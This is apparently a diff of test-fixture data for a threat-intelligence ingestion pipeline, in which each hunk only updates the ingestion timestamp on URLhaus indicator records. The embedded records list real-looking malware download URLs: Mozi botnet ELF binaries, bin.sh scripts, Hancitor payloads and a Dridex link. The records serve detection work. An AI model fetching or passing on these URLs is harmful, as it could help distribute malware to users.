@@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026722600Z", + "ingested": "2021-12-14T14:56:15.726510264Z", "original": "{\"id\":\"961233\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961233/\",\"url\":\"http://89.160.20.156:37489/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -15045,7 +15045,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026729600Z", + "ingested": "2021-12-14T14:56:15.726510636Z", "original": "{\"id\":\"961234\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961234/\",\"url\":\"http://89.160.20.156:51940/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -15094,7 +15094,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026736500Z", + "ingested": "2021-12-14T14:56:15.726511155Z", "original": "{\"id\":\"961235\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961235/\",\"url\":\"http://89.160.20.156:49599/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -15143,7 +15143,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026743400Z", + "ingested": "2021-12-14T14:56:15.726511871Z", "original": "{\"id\":\"961236\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961236/\",\"url\":\"http://89.160.20.156:53436/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -15192,7 +15192,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026750300Z", + "ingested": "2021-12-14T14:56:15.726512317Z", "original": "{\"id\":\"961237\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961237/\",\"url\":\"http://89.160.20.156:57237/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -15241,7 +15241,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026757200Z", + "ingested": "2021-12-14T14:56:15.726512680Z", "original": "{\"id\":\"961232\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961232/\",\"url\":\"http://89.160.20.156:50907/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -15290,7 +15290,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026764300Z", + "ingested": "2021-12-14T14:56:15.726513076Z", "original": "{\"id\":\"961231\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961231/\",\"url\":\"http://89.160.20.156:41910/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:14 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -15339,7 +15339,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026771300Z", + "ingested": "2021-12-14T14:56:15.726513527Z", "original": "{\"id\":\"961229\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961229/\",\"url\":\"http://89.160.20.156:57217/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -15388,7 +15388,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026778200Z", + "ingested": "2021-12-14T14:56:15.726530657Z", "original": "{\"id\":\"961230\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961230/\",\"url\":\"http://89.160.20.156:47632/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -15437,7 +15437,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026785100Z", + "ingested": "2021-12-14T14:56:15.726531059Z", "original": "{\"id\":\"961227\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961227/\",\"url\":\"http://89.160.20.156:46654/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -15486,7 +15486,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026792100Z", + "ingested": "2021-12-14T14:56:15.726531429Z", "original": "{\"id\":\"961228\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961228/\",\"url\":\"http://89.160.20.156:59073/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -15535,7 +15535,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026798900Z", + "ingested": "2021-12-14T14:56:15.726531916Z", "original": "{\"id\":\"961221\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961221/\",\"url\":\"http://89.160.20.156:37958/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -15584,7 +15584,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026805800Z", + "ingested": "2021-12-14T14:56:15.726532281Z", "original": "{\"id\":\"961222\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961222/\",\"url\":\"http://89.160.20.156:53943/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -15633,7 +15633,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026812700Z", + "ingested": "2021-12-14T14:56:15.726532651Z", "original": "{\"id\":\"961223\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961223/\",\"url\":\"http://89.160.20.156:40404/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -15682,7 +15682,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026819600Z", + "ingested": "2021-12-14T14:56:15.726533038Z", "original": "{\"id\":\"961224\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961224/\",\"url\":\"http://89.160.20.156:46738/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -15731,7 +15731,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026826400Z", + "ingested": "2021-12-14T14:56:15.726533408Z", "original": "{\"id\":\"961225\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961225/\",\"url\":\"http://89.160.20.156:58234/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -15780,7 +15780,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026833400Z", + "ingested": "2021-12-14T14:56:15.726533962Z", "original": "{\"id\":\"961226\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961226/\",\"url\":\"http://89.160.20.156:36911/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -15829,7 +15829,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026840400Z", + "ingested": "2021-12-14T14:56:15.726534333Z", "original": "{\"id\":\"961220\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961220/\",\"url\":\"http://89.160.20.156:35028/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:49:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -15877,7 +15877,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026847300Z", + "ingested": "2021-12-14T14:56:15.726534699Z", "original": "{\"id\":\"961219\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961219/\",\"url\":\"http://allanabolicsteam.net/nedfr_.exe\",\"url_status\":\"offline\",\"host\":\"allanabolicsteam.net\",\"date_added\":\"2021-01-14 18:47:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"abused_legit_malware\",\"surbl\":\"not listed\"},\"reporter\":\"Myrtus0x0\",\"larted\":\"true\",\"tags\":[\"c2\",\"hancitor\",\"payload\"]}", "category": "threat", "type": "indicator", 
@@ -15923,7 +15923,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026854400Z", + "ingested": "2021-12-14T14:56:15.726535063Z", "original": "{\"id\":\"961217\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961217/\",\"url\":\"https://intranetstc.micromart.com.br/fined.php\",\"url_status\":\"offline\",\"host\":\"intranetstc.micromart.com.br\",\"date_added\":\"2021-01-14 18:47:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"0x49736b\",\"larted\":\"false\",\"tags\":[\"Dridex\"]}", "category": "threat", "type": "indicator", @@ -15971,7 +15971,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026861300Z", + "ingested": "2021-12-14T14:56:15.726535537Z", "original": "{\"id\":\"961218\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961218/\",\"url\":\"http://allanabolicsteam.net/1301s.bin\",\"url_status\":\"online\",\"host\":\"allanabolicsteam.net\",\"date_added\":\"2021-01-14 18:47:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"abused_legit_malware\",\"surbl\":\"not listed\"},\"reporter\":\"Myrtus0x0\",\"larted\":\"true\",\"tags\":[\"c2\",\"hancitor\",\"payload\"]}", "category": "threat", "type": "indicator", @@ -16020,7 +16020,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026868200Z", + "ingested": "2021-12-14T14:56:15.726535958Z", "original": "{\"id\":\"961216\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961216/\",\"url\":\"http://89.160.20.156:43741/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:44:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", 
@@ -16070,7 +16070,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026875200Z", + "ingested": "2021-12-14T14:56:15.726536323Z", "original": "{\"id\":\"961215\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961215/\",\"url\":\"http://89.160.20.156:45803/bin.sh\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:41:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"false\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -16119,7 +16119,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026882200Z", + "ingested": "2021-12-14T14:56:15.726536689Z", "original": "{\"id\":\"961214\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961214/\",\"url\":\"http://89.160.20.156:38611/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:36:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -16168,7 +16168,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026889200Z", + "ingested": "2021-12-14T14:56:15.726537533Z", "original": "{\"id\":\"961213\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961213/\",\"url\":\"http://89.160.20.156:35185/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:36:12 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -16217,7 +16217,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026896100Z", + "ingested": "2021-12-14T14:56:15.726537900Z", "original": "{\"id\":\"961212\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961212/\",\"url\":\"http://89.160.20.156:35054/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:36:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -16266,7 +16266,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026903Z", + "ingested": "2021-12-14T14:56:15.726538268Z", "original": "{\"id\":\"961207\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961207/\",\"url\":\"http://89.160.20.156:60038/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -16315,7 +16315,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026910Z", + "ingested": "2021-12-14T14:56:15.726538623Z", "original": "{\"id\":\"961208\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961208/\",\"url\":\"http://89.160.20.156:52253/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -16364,7 +16364,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026916900Z", + "ingested": "2021-12-14T14:56:15.726539088Z", "original": "{\"id\":\"961209\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961209/\",\"url\":\"http://89.160.20.156:43125/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -16413,7 +16413,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026923900Z", + "ingested": "2021-12-14T14:56:15.726539508Z", "original": "{\"id\":\"961210\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961210/\",\"url\":\"http://89.160.20.156:52650/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -16462,7 +16462,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026930800Z", + "ingested": "2021-12-14T14:56:15.726539874Z", "original": "{\"id\":\"961211\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961211/\",\"url\":\"http://89.160.20.156:59273/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -16511,7 +16511,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026937700Z", + "ingested": "2021-12-14T14:56:15.726540251Z", "original": "{\"id\":\"961206\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961206/\",\"url\":\"http://89.160.20.156:40346/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -16560,7 +16560,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026944700Z", + "ingested": "2021-12-14T14:56:15.726540617Z", "original": "{\"id\":\"961204\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961204/\",\"url\":\"http://89.160.20.156:44242/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -16609,7 +16609,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026951700Z", + "ingested": "2021-12-14T14:56:15.726541063Z", "original": "{\"id\":\"961205\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961205/\",\"url\":\"http://89.160.20.156:40624/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -16658,7 +16658,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026958500Z", + "ingested": "2021-12-14T14:56:15.726541422Z", "original": "{\"id\":\"961202\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961202/\",\"url\":\"http://89.160.20.156:41245/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -16707,7 +16707,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026965500Z", + "ingested": "2021-12-14T14:56:15.726541788Z", "original": "{\"id\":\"961203\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961203/\",\"url\":\"http://89.160.20.156:48866/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -16756,7 +16756,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026972400Z", + "ingested": "2021-12-14T14:56:15.726542152Z", "original": "{\"id\":\"961198\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961198/\",\"url\":\"http://89.160.20.156:58258/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -16805,7 +16805,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026979400Z", + "ingested": "2021-12-14T14:56:15.726542519Z", "original": "{\"id\":\"961199\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961199/\",\"url\":\"http://89.160.20.156:34516/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -16854,7 +16854,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026986300Z", + "ingested": "2021-12-14T14:56:15.726543257Z", "original": "{\"id\":\"961200\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961200/\",\"url\":\"http://89.160.20.156:47851/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -16903,7 +16903,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026993200Z", + "ingested": "2021-12-14T14:56:15.726543616Z", "original": "{\"id\":\"961201\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961201/\",\"url\":\"http://89.160.20.156:49226/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -16953,7 +16953,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027000300Z", + "ingested": "2021-12-14T14:56:15.726543987Z", "original": "{\"id\":\"961197\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961197/\",\"url\":\"http://89.160.20.156:36957/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:34:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -17002,7 +17002,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027007200Z", + "ingested": "2021-12-14T14:56:15.726544351Z", "original": "{\"id\":\"961196\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961196/\",\"url\":\"http://89.160.20.156:53089/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:34:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -17051,7 +17051,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027014100Z", + "ingested": "2021-12-14T14:56:15.726544728Z", "original": "{\"id\":\"961193\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961193/\",\"url\":\"http://89.160.20.156:57114/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
